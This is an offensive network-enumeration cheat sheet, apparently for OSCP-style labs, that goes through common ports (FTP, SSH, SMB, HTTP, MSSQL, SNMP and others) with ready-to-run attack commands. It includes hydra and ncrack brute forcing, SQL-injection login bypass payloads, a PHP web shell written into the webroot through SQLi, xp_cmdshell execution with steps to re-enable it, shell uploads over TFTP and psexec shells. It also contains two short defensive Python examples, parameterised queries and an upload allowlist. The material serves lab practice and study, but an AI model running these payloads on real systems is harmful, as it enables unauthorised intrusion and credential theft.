Network enum - Ports

A quick checklist of possible attack vectors for the different ports

TCP

21 - FTP

Checks

  • Check if you have anonymous access

  • Check if you can upload a file to trigger a webshell through the webapp

  • Check if you can download backup files to extract included passwords

  • Check the version of FTP for exploits

Commands

Log in to the FTP server (for anonymous access, use the credentials anonymous:anonymous)

ftp $ip

FTP specific nmap scan

nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip

Tip: Before starting scans, set a bash variable to the IP address you are scanning, like ip=10.11.1.1. The $ip value in the commands of this cheat sheet will then be filled in automatically.

22 - SSH

Checks

  • Try easy username-password combinations

  • Check for username enumeration vulnerabilities

  • Check version for vulnerabilities

  • (Only when getting desperate) Try brute force with Hydra, Medusa, ...

Commands

Nmap scan

#adjust -p if SSH listens on a non-standard port; quote the script glob so the shell does not expand it
nmap -p 22 -sV -Pn -T4 --script="ssh*" $ip

Brute force

hydra -v -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 $ip ssh
hydra -l gibson -P /tmp/alpha.txt -T 20 $ip ssh

Connect through found key

#make the key readable only by the current user, otherwise ssh refuses to use it
chmod 0600 user.key
ssh -i user.key <user>@$ip

25 - SMTP

Checks

  • Check for user enumeration

  • Check version for exploits

Commands

nmap scan

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip

user enumeration

#manual way
nc -nvv $ip 25
VRFY root
(user exists if the server replies with a 250 line containing the mailbox, e.g. "250 Georgia <[email address]>")
(user doesn't exist if the server replies with "551 user not local")
#automated way
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip

80/443 - HTTP(S)

Checks

  • Login portals

    • try the default credentials of the application

    • try usernames already seen throughout the application or in other services like SMTP

    • try SQL injection bypasses

    • try registering a new user

    • brute force with hydra, medusa, ...

  • Check robots.txt for hidden directories

  • Brute force directories to find hidden content

  • Check for passwords/URLs/versions/... in comments of web app

  • Check version numbers for known exploits

    • Check changelog for version information

    • Estimate version based on copyright date (if not automatically adjusted)

  • Check if a specific CMS like WordPress is used and then use platform-specific scanners

  • Ways to get RCE

    • check for file upload functionalities (if uploads are filtered, try alternative extensions)

    • execute commands through SQLi

    • Shellshock

    • command injection

    • trigger injected code through path traversal

Enumeration scans

Directory brute force

#start off with a general scan
gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 50
#add extensions
gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 100 -x php,txt,cgi,sh,pl,py -s "200,204,301,302,307,403,500"

nmap scan

nmap -sV -Pn --script=ssl-heartbleed,http-adobe-coldfusion-apsa1301.nse,http-apache-negotiation.nse,http-apache-server-status.nse,http-aspnet-debug.nse,http-auth-finder.nse,http-auth.nse,http-avaya-ipoffice-users.nse,http-awstatstotals-exec.nse,http-axis2-dir-traversal.nse,http-backup-finder.nse,http-barracuda-dir-traversal.nse,http-bigip-cookie.nse,http-brute.nse,http-cakephp-version.nse,http-cisco-anyconnect.nse,http-coldfusion-subzero.nse,http-comments-displayer.nse,http-config-backup.nse,http-cookie-flags.nse,http-cors.nse,http-cross-domain-policy.nse,http-csrf.nse,http-date.nse,http-default-accounts.nse,http-devframework.nse,http-dlink-backdoor.nse,http-dombased-xss.nse,http-domino-enum-passwords.nse,http-drupal-enum-users.nse,http-drupal-enum.nse,http-enum.nse,http-errors.nse,http-exif-spider.nse,http-feed.nse,http-fileupload-exploiter.nse,http-form-brute.nse,http-form-fuzzer.nse,http-frontpage-login.nse,http-git.nse,http-gitweb-projects-enum.nse,http-headers.nse,http-huawei-hg5xx-vuln.nse,http-iis-short-name-brute.nse,http-iis-webdav-vuln.nse,http-internal-ip-disclosure.nse,http-joomla-brute.nse,http-jsonp-detection.nse,http-litespeed-sourcecode-download.nse,http-ls.nse,http-majordomo2-dir-traversal.nse,http-mcmp.nse,http-method-tamper.nse,http-methods.nse,http-mobileversion-checker.nse,http-ntlm-info.nse,http-open-redirect.nse,http-passwd.nse,http-php-version.nse,http-phpmyadmin-dir-traversal.nse,http-phpself-xss.nse,http-proxy-brute.nse,http-put.nse,http-qnap-nas-info.nse,http-rfi-spider.nse,http-robots.txt.nse,http-security-headers.nse,http-server-header.nse,http-shellshock.nse,http-sitemap-generator.nse,http-sql-injection.nse,http-stored-xss.nse,http-svn-enum.nse,http-svn-info.nse,http-title.nse,http-tplink-dir-traversal.nse,http-trace.nse,http-traceroute.nse,http-trane-info.nse,http-unsafe-output-escaping.nse,http-useragent-tester.nse,http-userdir-enum.nse,http-vhosts.nse,http-vlcstreamer-ls.nse,http-vmware-path-vuln.nse,http-vuln-cve2006-3392.nse,http-vuln-cve2009-3960.nse,http-vuln-cve2010-0738.nse,http-vuln-cve2010-2861.nse,http-vuln-cve2011-3368.nse,http-vuln-cve2012-1823.nse,http-vuln-cve2013-0156.nse,http-vuln-cve2013-6786.nse,http-vuln-cve2013-7091.nse,http-vuln-cve2014-2126.nse,http-vuln-cve2014-2127.nse,http-vuln-cve2014-2128.nse,http-vuln-cve2014-3704.nse,http-vuln-cve2014-8877.nse,http-vuln-cve2015-1427.nse,http-vuln-cve2015-1635.nse,http-vuln-cve2017-1001000.nse,http-vuln-cve2017-5638.nse,http-vuln-cve2017-5689.nse,http-vuln-cve2017-8917.nse,http-vuln-misfortune-cookie.nse,http-vuln-wnr1000-creds.nse,http-waf-detect.nse,http-waf-fingerprint.nse,http-webdav-scan.nse,http-wordpress-brute.nse,http-wordpress-enum.nse,http-wordpress-users.nse,http-xssed.nse,membase-http-info.nse -p 80 $ip

webdav scanning

davtest --url http://$ip
davtest -move -sendbd auto -url http://$ip:8080/webdav/
cadaver http://$ip:8080/webdav/

Nikto scans

nikto -host $ip | tee nikto.log

Login portals

brute force login portals

#basic auth
hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
#login form
hydra -L users.txt -P users.txt $ip http-post-form "<directory>:login_username=^USER^&secretkey=^PASS^&<rest of post request>:<error message>"
#create custom password list
cewl -w cewl_passlist.txt -d 5 10.11.1.39/otrs/index.pl

Standard credentials to try when blocked by a login portal

admin:admin
admin:password
admin:administrator
admin:(name of box)
user:user
user:password
user:12345
guest:guest
root:root
(name of box):(name of box)
(default account):(name of application)

Try SQL injections to bypass the login form

' or 1=1;--
' or '1'='1
' or 1=1;#
') or ('x'='x
' or <column> like '%';--
' or 1=1 LIMIT 1;--
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' or 1/*
*/ =1 --
admin' or 'a'='a
'#
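Why these payloads work and what stops them, as an added example (Python with sqlite3, not part of the original cheat sheet): a login query built by string concatenation next to the parameterised form. The users table, its credentials and the "wrong" password are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table for the demonstration."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    db.commit()
    return db


def login_vulnerable(db, username, password):
    # The form values are pasted into the SQL text, so a single quote in the
    # input closes the string and what follows is parsed as SQL. A trailing
    # "--" comments out the password check entirely.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone()[0] > 0
    except sqlite3.Error:
        return False  # payloads that break the syntax simply fail to log in


def login_safe(db, username, password):
    # Parameter binding keeps the SQL text fixed; the values travel
    # separately, so quotes and comment markers stay plain data.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0


def attempt(login, username, password):
    """Run one login attempt against a fresh constructed database."""
    return login(make_db(), username, password)


# Payloads from the list above that fit this query shape: the first two go in
# the username field, the third in the password field (AND binds tighter than
# OR, so "' or '1'='1" only bypasses when it is the last condition).
USERNAME_PAYLOADS = ["admin' --", "' or 1=1--"]
PASSWORD_PAYLOAD = "' or '1'='1"


def bypass_summary(login):
    """Which payloads log in without the real password, per login function."""
    results = {p: attempt(login, p, "wrong") for p in USERNAME_PAYLOADS}
    results[PASSWORD_PAYLOAD] = attempt(login, "nobody", PASSWORD_PAYLOAD)
    return results
```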

File upload

Try alternative extensions for file uploads

php - try case variations (pHp, phP) or a double extension (test.php.jpg); also .phtml, .php3, .php4, .php5 and .inc
asp - .asp, .aspx
perl - .pl, .pm, .cgi, .lib
jsp - .jsp, .jspx, .jsw, .jsv and .jspf
coldfusion - .cfm, .cfml, .cfc, .dbm
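Added example (Python, not from the original cheat sheet) showing why the alternative extensions above defeat a naive suffix denylist, next to an allowlist check that rejects case variations, double extensions and path components. The allowed extension set and the probe file names are constructed for the demonstration.

```python
import os

# Extensions the upload feature legitimately accepts (constructed for this example).
ALLOWED_IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def is_allowed_denylist(filename):
    # Weak filter seen in many apps: only a literal, case-sensitive ".php"
    # suffix is rejected, so pHp, .phtml, .php5 and test.php.jpg all pass.
    return not filename.endswith(".php")


def is_allowed_allowlist(filename):
    """Hardened filter: strip any directory part, require a base name plus at
    least one extension, and demand that every dot-separated extension (not
    only the last one) is in the allowlist, compared case-insensitively."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or parts[0] == "" or "\x00" in base:
        return False
    return all(ext in ALLOWED_IMAGE_EXTENSIONS for ext in parts[1:])


# Upload names constructed from the alternative-extension list above.
PROBES = ["photo.jpg", "shell.php", "shell.pHp", "shell.php.jpg",
          "shell.phtml", "shell.php5", "cmd.cgi", "../shell.jsp"]


def compare_filters():
    """Return {filename: (denylist_verdict, allowlist_verdict)} for each probe."""
    return {f: (is_allowed_denylist(f), is_allowed_allowlist(f)) for f in PROBES}
```

Even with the allowlist, store uploads under a server-generated name outside the web root so a file that passes the name check can never be executed by the web server.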

File traversal list

RCE through SQLi

#Through file creation
union all select "<?php echo shell_exec($_GET['cmd']);?>",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
#if running as database admin, use xp_cmdshell
http://www.example.com/news.asp?id=1; exec master.dbo.xp_cmdshell 'command'
'; exec master.dbo.xp_cmdshell 'command'
#On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1;--
RECONFIGURE;--
EXEC sp_configure 'xp_cmdshell', 1;--
RECONFIGURE;--
#On MSSQL 2000:
EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--

If exploits for web apps don't work as expected, proxy the traffic through Burp and inspect the requests that are actually sent.

110 - POP3

Checks

  • Check version for exploits

  • Check mails for the presence of credentials

Commands

manually log in to the service

#connect and check for banner
telnet $ip 110
#guess login credentials
USER pelle
PASS admin
#list all emails
list
#retrieve email number 5 for example
retr 5

111 - NFS/RPC

Checks

  • Check for passwords in files on mountable drives

Commands

#check general rpc info
rpcinfo $ip
#Check what shares you can mount
showmount -e $ip
#mounting the share
#make the mount point
mkdir /mnt/share
#mount the share (nolock avoids a hang when the server runs no lock daemon)
mount -t nfs -o nolock $ip:/share /mnt/share

Keep mountable shares in mind: a share exported without root squashing (no_root_squash) lets a local root user write root-owned files onto it, which can be used to elevate your privileges to root on the box.

139/445 - SMB

Checks

  • Check for null sessions

  • Check the permissions of users you already have

  • Check for passwords in files

  • Attempt brute force on enumerated users

  • Check for EternalBlue

  • Check samba version (if Linux)

Commands (Automated)

nmap scan

#general scan
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse $ip -p 445
#vulnerability scan
nmap --script "smb-vuln*" -p 445 -oA nmap_smb_vulns $ip

Check samba versions

#!/bin/bash
#save this script as samba_version.sh, make it executable and run ./samba_version.sh RHOST {RPORT}
if [ -z "$1" ]; then echo "Usage: ./samba_version.sh RHOST {RPORT}" && exit 1; else rhost="$1"; fi
if [ -n "$2" ]; then rport="$2"; else rport=139; fi
#sniff the SMB reply from the target (change tap0 to your interface) and pull the Samba version string out of it
tcpdump -s0 -n -i tap0 src "$rhost" and port "$rport" -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: "
#trigger the SMB handshake so the server sends its version string
echo "exit" | smbclient -L "$rhost" 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""

enum4linux

enum4linux -a $ip

smbmap

#list general folders
smbmap -H $ip
#recursively list dirs and files
smbmap -R $sharename -H $ip
smbmap -R "Users" -H $ip -u Guest
#download a file
smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q

CrackMapExec

#check if you can connect through null sessions (check what rights you have on the shares)
cme smb $ip -u '' -p '' --shares
cme smb $ip -u '' -p '' --shares --port 139
#enumerate the users
#rid brute forcing
cme smb $ip -u "" -p "" --rid-brute
#active sessions
cme smb $ip -u '' -p '' --loggedon-users
#users in general
cme smb $ip -u '' -p '' --users
#enumerate the groups
#local groups
cme smb $ip -u '' -p '' --local-groups
#domain groups
cme smb $ip -u '' -p '' --groups
#check for the password policy
cme smb $ip -u "" -p "" --pass-pol

mount shares and inspect files manually

#smbclient
smbclient -L $ip
smbclient //$ip/tmp
smbclient \\\\192.168.1.105\\ipc$ -U john
smbclient //$ip/ipc$ -U john
#mounting the share (use forward slashes, bash would eat the backslashes)
mkdir /mnt/targetshare
mount -t cifs //172.16.20.88/ipc$ -o username=<username> /mnt/targetshare

brute force smb

hydra -l Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt $ip smb -V -f
#in OSCP the passwords are often equal to the username
hydra -L usernames.txt -P usernames.txt $ip smb -V -f

Gaining shell through psexec (user needs to be admin)

#copy script
cp /usr/share/doc/python-impacket/examples/psexec.py .
#specific command test
python psexec.py <username>:<pass>@10.11.1.227 whoami
#shell
rlwrap python psexec.py <username>:<pass>@10.11.1.227
#NOTE: be careful with exclamation marks in passwords, escape them with a backslash (e.g. rottenadmin:<pass\!word>) so bash does not expand them
#through crackmapexec (didn't always work for me)
cme smb 10.11.1.227 -u "backup" -p "backup" -x whoami

1433 - MSSQL

Checks

  • Try default credentials "sa:password"

  • Brute force creds

  • Check database content for new passwords

  • Check version for exploits

  • RCE

    • through xp_cmdshell functionality

    • through injecting payload in output file, placing it in webroot and triggering it through webapp

Commands

nmap

nmap -p 1433 --script='banner,(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)' $ip -oN 1433_nmap_mssql

credential brute force

nmap -p 1433 --script ms-sql-brute --script-args passdb=/usr/share/seclists/Passwords/darkweb2017-top1000.txt $ip

manually logging in and gaining shell

#login
sqsh -S $ip -U sa -P password
sqsh -S $ip:27900 -U sa -P password
#execute commands
xp_cmdshell 'date'
go

3306 - MySQL

Checks

  • Try default credentials "root":""

  • Brute force credentials

  • Check database content for new passwords

  • Check version for exploits

Commands

nmap

nmap -sV -Pn --script=mysql-audit.nse,mysql-brute.nse,mysql-databases.nse,mysql-dump-hashes.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-query.nse,mysql-users.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p 3306 -oN 3306_nmap_mysql $ip

try default password

#press enter at the password prompt to try the empty password
mysql --host=$ip -u root -p

3389 - RDP

Checks

  • Check if you can log in with the default guest account and a blank password

  • Check if you can brute force users

  • Check for BlueKeep

Commands

nmap

nmap -p 3389 --script=rdp-enum-encryption,rdp-vuln-ms12-020 $ip -oN 3389_nmap_rdp

manually login

rdesktop $ip
#Try default guest account "guest":""
rdesktop -u guest $ip -g 94%

Start brute force

ncrack -vv --user Administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
ncrack -vv --user Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt rdp://$ip

5900 - VNC

Checks

  • check for easy VNC passwords

  • check for exploits for VNC version

  • brute force VNC password

Commands

nmap

nmap -sV -Pn -p 5900 --script=vnc-info,vnc-title,realvnc-auth-bypass $ip -oA 5900_nmap_VNC

VNC brute force of the password

hydra -s 5900 -P /usr/share/seclists/Passwords/darkweb2017-top10.txt -t 30 $ip vnc

UDP

53 - DNS

Checks

  • Try zone transfer

  • Brute force subdomains

Commands

do a DNS lookup specifying the DNS server

nslookup
#set the nameserver to the ip of the box
> server 10.10.10.13
#reverse lookup of the box ip address
> 10.10.10.13

subdomain enumeration / brute force

dig axfr @$ip test.htb
fierce -dns ext.recon.lan -dnsserver 172.16.90.53
gobuster dns -d ext.recon.lan -r 172.16.90.53 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

69 - TFTP

Checks

  • search for files to find sensitive info like passwords

  • upload shells to trigger them in web app

Commands

nmap

nmap -sU -p 69 --script tftp-enum.nse $ip

Interact with TFTP protocol

#setup the connection
tftp 172.16.200.100
#get a file
tftp> get /etc/passwd
#upload reverse shell
tftp> put shell.php

automated search for sensitive files (Metasploit)

msfconsole
use auxiliary/scanner/tftp/tftpbrute
set RHOSTS $ip
set DICTIONARY /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
run

161 - SNMP

Checks

  • Try the default community strings 'public' and 'private'

  • Enumerate the OS version, users and processes

Commands

nmap

nmap -sU -p 161 --script "snmp-*" $ip

scan a range of ip addresses for snmp community strings

#only try "public" and "private"
onesixtyone -i targets.list
#try 100+ community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $ip

enumerate information with known community string

# enumerate windows users
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25
# enumerates running processes
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2